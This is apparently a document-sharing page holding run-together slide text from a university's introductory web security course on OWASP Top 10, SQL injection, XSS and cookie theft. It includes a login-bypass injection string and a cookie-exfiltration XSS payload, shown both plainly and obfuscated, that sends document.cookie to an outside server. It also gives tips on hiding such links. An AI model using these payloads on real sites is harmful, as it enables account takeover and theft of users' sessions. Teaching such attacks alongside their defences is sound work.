版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
中央大學(xué)電子計算機(jī)中心
「多媒體與網(wǎng)路應(yīng)用」
資訊推廣課程網(wǎng)頁應(yīng)用程式的安全入門Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session2Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session3不要做壞事!4不要被抓到!5不要被抓到!6不要說我教的7Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session8網(wǎng)頁安全?早年vs現(xiàn)代靜態(tài)vs動態(tài)有程式就有漏洞!9waystoattackOSwebserverwebapplication10attackscenariosattackwebserver
gainprivilege
stealinformations
toattackusersattackotheruser
stealinformations
executeotherattacksmaybecomposite11Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session1213OWASPTop10-2010A1:InjectionA2:Cross-SiteScripting(XSS)A3:BrokenAuthenticationandSessionManagementA4:InsecureDirectObjectReferencesA5:Cross-SiteRequestForgery(CSRF)14OWASPTop10-2010A6:SecurityMisconfigurationA7:InsecureCryptographicStorageA8:FailuretoRestrictURLAccessA9:InsufficientTransportLayerProtectionA10:UnvalidatedRedirectsandForwards15OWASPTop10-2010A1:InjectionA2:Cross-SiteScripting(XSS)A3:BrokenAuthenticationandSessionManagementA4:InsecureDirectObjectReferencesA5:Cross-SiteRequestForgery(CSRF)16OWASPTop10-2010A6:SecurityMisconfigurationA7:InsecureCryptographicStorageA8:FailuretoRestrictURLAccessA9:InsufficientTransportLayerProtectionA10:UnvalidatedRedirectsandForwards17Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session18Injections駭客的填空遊戲wherecanattackerinject?
database(MySQL,MSSQL,PostgreSQL...)
no-sql
DirectoryService(LDAP)
systemcommand!!19howSQLworksinwebloginpageforexampleclientwebserversqlserverrequestwhitidandpwdselectfromaccountwhere`id`=idand`pwd`=pwdreturnresultreturnloginsuccess/failed20WhySQL?廣大使用儲存大量的網(wǎng)站資料injectionfriendly21howinjectionswork?以MySQL為例子$query=“selectfromaccountwhere`id`=’$id’and`pwd`=’$pwd’
$id=’or1=1--
>selectfromaccountwhere`id`=’’--22attackskillsunionblindattack23影響資料被偷/被改獲得網(wǎng)站權(quán)限整個網(wǎng)站被拿下#24howtodefensesafeAPI過濾逃脫字元不要直接把使用者輸入加入query找程式掃描弱點(diǎn)25Practice26Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session27XSSCrossSiteScripting在別人的網(wǎng)站上寫程式!28backgroundknowledgeHTTPGETHTTPPOST29howtoattackattackusingPOST/GETthe“scripting”intheserverstrangeurl30howtoattackjavascript<iframe>/<image>31example<body><?echo“Hello”.$_GET[‘id’].”;?></body>/?id=<script>alert(“i’mOrange”)</script>32whatmayhappened?takeyoutobadsitesendyourinformationtoattackerJustForFun!33JustForFunSamyMySpaceXSSattackSamyismyhero!Infection34BigSitealsoXSSableMySpaceFacebooktwitterPlurk...35howtodefenseforserver該逃的還是要逃找程式掃描弱點(diǎn)foruser看到奇怪連結(jié)要警覺瀏覽器/防毒軟體36practice37Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session38backgroundknowledgecookie
session
Acookieisapieceoftextstoredbyauser'swebbrowser.Acookiecanbeusedforauthentication,storingsitepreferences,shoppingcartcontents,theidentifierforaserver-basedsession,oranythingelsethatcanbeaccomplishedthroughstoringtextdata.Thesessioninformationisstoredonthewebserverusingthesessionidentifier(sessionID)generatedasaresultofthefirst(sometimesthefirstauthenticated)requestfromtheenduserrunningawebbrowser.The"storage"ofsessionIDsandtheassociatedsessiondata(username,accountnumber,etc.)onthewebserverisaccomplishedusingavarietyoftechniquesincluding,butnotlimitedto:localmemory,flatfiles,anddatabases.394041如果偷到了cookie可以42howtostealit?4344把cookie送到雲(yún)端!用GET/POST方式讓網(wǎng)頁把cookie送走<img>/<iframe>
ex:["<imgsrc='http://in1.ncu.cc/~975002063/keke/t.php?t=",document.cookie,">"].join(seversideissimple
justkeepthecookie45哪個白癡
會點(diǎn)這鬼連結(jié)/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%2246hidden有種東西叫短網(wǎng)址
(/0rz.tw/goo.gl/bit.ly)塞進(jìn)別的網(wǎng)頁裡
(ex:iframe長寬設(shè)0或1)uglyurlEVERYWHERE/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2F%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1<mpl=default<mplcache=2/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=/cgi-bin/kcookie.cgi/www/http%3a//&rl=147防範(fàn)鎖定useragent/header綁IP*不要被攻擊成功*48鎖定useragent/headerif(isset($_SESSION['HTTP_USER_AGENT'])){if($_SESSION['HTTP_USER_AGENT']!=md5($_SERVER['HTTP_USER_AGENT'])){exit();
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2026黑龍江農(nóng)墾建工路橋有限公司招聘1人參考題庫附答案
- 北京中國石油大學(xué)教育基金會招聘2人參考題庫附答案
- 湖北某國有企業(yè)人員招聘考試備考題庫附答案
- 2026年重慶公務(wù)員筆試題庫必考題
- 2026江西南昌市昌南學(xué)校招聘派遣制教師1人考試備考題庫附答案
- 廣安市廣安區(qū)龍安鄉(xiāng)人民政府關(guān)于2025年選用1名片區(qū)紀(jì)檢監(jiān)督員的考試備考題庫附答案
- 芬蘭幼兒園介紹
- 艾薇兒介紹教學(xué)
- 2025四川虹信軟件股份有限公司招聘數(shù)字化工廠實施顧問崗位擬錄用人員筆試歷年參考題庫附帶答案詳解
- 2025內(nèi)蒙古華電氫能科技有限公司面向華電系統(tǒng)內(nèi)外招聘8人筆試參考題庫附帶答案詳解(3卷)
- 2026年湖南師大附中雙語實驗學(xué)校(南校區(qū))教師招聘備考題庫完整參考答案詳解
- 2026年廣州市黃埔區(qū)穗東街招考編外服務(wù)人員易考易錯模擬試題(共500題)試卷后附參考答案
- 黑龍江高職單招語文試題附答案
- 高低壓配電安裝工程施工方案方案
- 中華人民共和國危險化學(xué)品安全法解讀
- 2026年中國煙草專業(yè)知識考試題含答案
- 2026年度內(nèi)蒙古自治區(qū)行政執(zhí)法人員專場招收備考題庫完整答案詳解
- 2026云南新華書店集團(tuán)限公司公開招聘34人易考易錯模擬試題(共500題)試卷后附參考答案
- 安全保密管理專題培訓(xùn)課件
- GB/T 17587.2-2025滾珠絲杠副第2部分:公稱直徑、公稱導(dǎo)程、螺母尺寸和安裝螺栓公制系列
- 鍋爐應(yīng)急預(yù)案演練(3篇)
評論
0/150
提交評論